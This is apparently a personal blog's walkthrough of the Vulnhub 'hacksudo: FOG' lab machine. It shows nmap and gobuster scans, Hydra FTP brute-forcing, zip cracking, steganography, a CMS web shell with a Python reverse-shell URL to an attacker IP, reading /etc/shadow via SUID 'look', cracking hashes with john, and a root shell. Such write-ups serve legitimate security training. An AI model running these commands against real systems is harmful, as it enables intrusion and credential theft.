Windy's little blog

一切生活中的杂七杂八, and I like CTF.

Vulnhub hacksudo: FOG Walkthrough


Vulnhub hacksudo: FOG Walkthrough

https://www.vulnhub.com/entry/hacksudo-fog,697/

Scan open ports.

 nmap -sV -sC -p- -oN ports.log 192.168.56.100
 
 PORT      STATE SERVICE   VERSION                                               21/tcp    open  ftp       Pure-FTPd
 22/tcp    open  ssh       OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 80/tcp    open  http      Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Hacksudo FOG
 111/tcp   open  rpcbind   2-4 (RPC #100000)
 443/tcp   open  ssl/https Apache/2.4.38 (Debian)
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Hacksudo FOG
 2049/tcp  open  nfs_acl   3 (RPC #100227)
 3306/tcp  open  mysql     MySQL 5.5.5-10.3.27-MariaDB-0+deb10u1
 ...
 43195/tcp open  mountd    1-3 (RPC #100005)
 45469/tcp open  nlockmgr  1-4 (RPC #100021)
 48871/tcp open  mountd    1-3 (RPC #100005)
 52195/tcp open  mountd    1-3 (RPC #100005)

Scan folders/files of port 80, download dict.txt.

 gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-big.txt  -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 /index.php            (Status: 302) [Size: 0] [--> /fog/index.php]
 /index.html           (Status: 200) [Size: 853]
 /index1.html          (Status: 200) [Size: 329]
 /cms                  (Status: 301) [Size: 314] [--> http://192.168.56.100/cms/]
 /dict.txt             (Status: 200) [Size: 1798]
 /fog                  (Status: 301) [Size: 314] [--> http://192.168.56.100/fog/]
 

Found username hacksudo at cms page.


Bruteforce ftp.

 hydra -l hacksudo -P dict.txt  -t 32 192.168.56.100 ftp -f
 Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
 Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-18 22:38:34
 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
 [DATA] max 32 tasks per 1 server, overall 32 tasks, 196 login tries (l:1/p:196), ~7 tries per task
 [DATA] attacking ftp://192.168.56.100:21/
 [21][ftp] host: 192.168.56.100   login: hacksudo   password: hackme
 [STATUS] attack finished for 192.168.56.100 (valid pair found)
 1 of 1 target successfully completed, 1 valid password found

Download secr3tSteg.zip.

 ftp> ls -la
 200 PORT command successful
 150 Connecting to port 43827
 drwxr-xr-x    3 1002       ftpgroup         4096 May  7 03:34 .
 drwxr-xr-x    3 1002       ftpgroup         4096 May  7 03:34 ..
 -rw-r--r--    1 33         33                389 May  7 03:34 flag1.txt
 drwxr-xr-x    2 0          0                4096 May  6 13:57 hacksudo_ISRO_bak
 226-Options: -a -l
 226 4 matches total
 ftp> cd hacksudo_ISRO_bak
 250 OK. Current directory is /hacksudo_ISRO_bak
 ftp> ls -la
 200 PORT command successful
 150 Connecting to port 46515
 drwxr-xr-x    2 0          0                4096 May  6 13:57 .
 drwxr-xr-x    3 1002       ftpgroup         4096 May  7 03:34 ..
 -rw-r--r--    1 0          0                  63 May  5 11:07 authors.txt
 -rw-r--r--    1 0          0                   0 May  6 11:36 installfog
 -rw-r--r--    1 0          0             1573833 May  6 19:24 secr3tSteg.zip

Bruteforce password of zip.

 fcrackzip -u -D -p /usr/share/wordlists/rock_ascii.txt secr3tSteg.zip    
 PASSWORD FOUND!!!!: pw == fooled

Download the SoundStegno provided at source code of index1.html.


Decrypt the wav file unzipped from secr3tSteg.zip, get hints.

 python3 /opt/SoundStegno/ExWave.py  -f ./hacksudoSTEGNO.wav  
 ...
 Visit for more tutorials : www.youtube.com/techchipnet
 Hide your text message in wave audio file like MR.ROBOT
 Please wait...
 Your Secret Message is: Shift by 3
 ABCDEFGHIJKLMNOPQRSTUVWXYZ
 DEFGHIJKLMNOPQRSTUVWXYZABC
 zzzz.orfdokrvw/irj Xvhuqdph=irj:sdvvzrug=kdfnvxgrLVUR
 

Decrypt Caesar message at http://rumkin.com/tools/cipher/caesar-keyed.php.


Login cms with  hacksudo:hacksudoISRO. Found cmsmsrce.txt.


Check content of the txt file.


Copy cmsmsrce.txt to shell.php, visit the following address in browser.

http://192.168.56.100/cms/uploads/shell.php?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.150%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/bash%22,%22-i%22]);%27

At the same time, listen at port 1234 in another terminal, get reverse shell.


Find suid files.

 find / -perm -u=s 2>/dev/null
 /usr/lib/openssh/ssh-keysign
 /usr/lib/eject/dmcrypt-get-device
 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
 /usr/sbin/mount.nfs
 /usr/bin/gpasswd
 /usr/bin/umount
 /usr/bin/sudo
 /usr/bin/chfn
 /usr/bin/look
 /usr/bin/mount
 /usr/bin/chsh
 /usr/bin/newgrp
 /usr/bin/su
 /usr/bin/passwd
 

Use look to read /etc/shadow.

 www-data@hacksudo:/home$ look '' /etc/shadow
 look '' /etc/shadow
 root:$6$zHA6yDSHPcoPX7dX$2oZJxM7gBzhQIT049d4MuR7jAypyZpDPoo6aKQfkJAfJNKF/CgY1GYFCu.Wb5cB6713Zjtzgk.ls0evZ6YToD/:18756:0:99999:7:::
 ...
 isro:$6$DMdxcRB0fQbGflz2$39vmRyBB0JubEZpJJN13rSzssMQ6t1R6KXLSPjOmpImsyuWqyXHneT8CH0nKr.XDEzKIjt1H3ndbNzirCjOAa/:18756:0:99999:7:::
 dnsmasq:*:18756:0:99999:7:::
 

Crack password of isro.

  john --wordlist=/usr/share/wordlists/rock_ascii.txt  hash.txt                                fish-0 | 0 [23:32:44]
 Using default input encoding: UTF-8
 Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
 Cost 1 (iteration count) is 5000 for all loaded hashes
 Will run 2 OpenMP threads
 Press 'q' or Ctrl-C to abort, almost any other key for status
 qwerty           (isro)

Log in ssh as user isro. Check sudo, but it's rabbit hole.

 ssh isro@192.168.56.100
 isro@192.168.56.100's password:
 Linux hacksudo 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
 
 The programs included with the Debian GNU/Linux system are free software;
 the exact distribution terms for each program are described in the
 individual files in /usr/share/doc/*/copyright.
 
 Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
 permitted by applicable law.
 Last login: Tue May 18 11:33:26 2021 from 192.168.56.150
 isro@hacksudo:~$ sudo -l
 [sudo] password for isro:
 Matching Defaults entries for isro on hacksudo:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 
 User isro may run the following commands on hacksudo:
     (root) /usr/bin/ls /home/isro/*
 isro@hacksudo:~$
 

In /home/isro/fog, found a executable file of user root.

 isro@hacksudo:~$ ls -la
 total 40
 drwxr-x--- 5 isro isro 4096 May 18 12:16 .
 drwxr-xr-x 6 root root 4096 May  8 12:25 ..
 -rw------- 1 root isro   41 May 18 11:44 .bash_history
 -rw-r--r-- 1 isro isro    0 May  5 14:05 .bash_logout
 -rw-r--r-- 1 isro isro 4623 May 13 04:59 .bashrc
 drwxr-xr-x 2 isro isro 4096 May 13 05:06 fog
 drwx------ 3 isro isro 4096 May  5 14:09 .gnupg
 drwxr-xr-x 3 isro isro 4096 May  5 14:11 .local
 -rw-r--r-- 1 isro isro    0 May  5 14:05 .profile
 -r-------- 1 isro isro   33 May  6 14:31 user.txt
 -rw------- 1 isro isro   54 May 18 12:16 .Xauthority
 isro@hacksudo:~$ cd fog
 isro@hacksudo:~/fog$ ls -la
 total 3700
 drwxr-xr-x 2 isro isro    4096 May 13 05:06 .
 drwxr-x--- 5 isro isro    4096 May 18 12:16 ..
 -rwxr-xr-x 1 root isro   16712 May 12 13:46 fog
 -rw-r--r-- 1 isro isro       0 May  6 14:30 get
 -rwxr-xr-x 1 isro isro   69368 May  6 14:29 ping
 -rwxr-xr-x 1 isro isro 3689352 May  6 14:30 python
 

Run fog, get python shell, check id, it's root.

 isro@hacksudo:~/fog$ ./fog
 Python 2.7.16 (default, Oct 10 2019, 22:02:15)
 [GCC 8.3.0] on linux2
 Type "help", "copyright", "credits" or "license" for more information.
 >>> import os;os.system("id");
 uid=0(root) gid=1003(isro) groups=1003(isro)
 0

Spawn a root shell.

 >>> import pty;pty.spawn("/bin/bash");
 ┌──(root💀hacksudo)-[~/fog]
 └─# id;hostname
 uid=0(root) gid=1003(isro) groups=1003(isro)
 hacksudo
 ┌──(root💀hacksudo)-[~/fog]
 └─# c
 bash: c: command not found
 ┌──(root💀hacksudo)-[~/fog]
 └─#
 ┌──(root💀hacksudo)-[~/fog]
 └─#

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Powered By Z-BlogPHP 1.7.0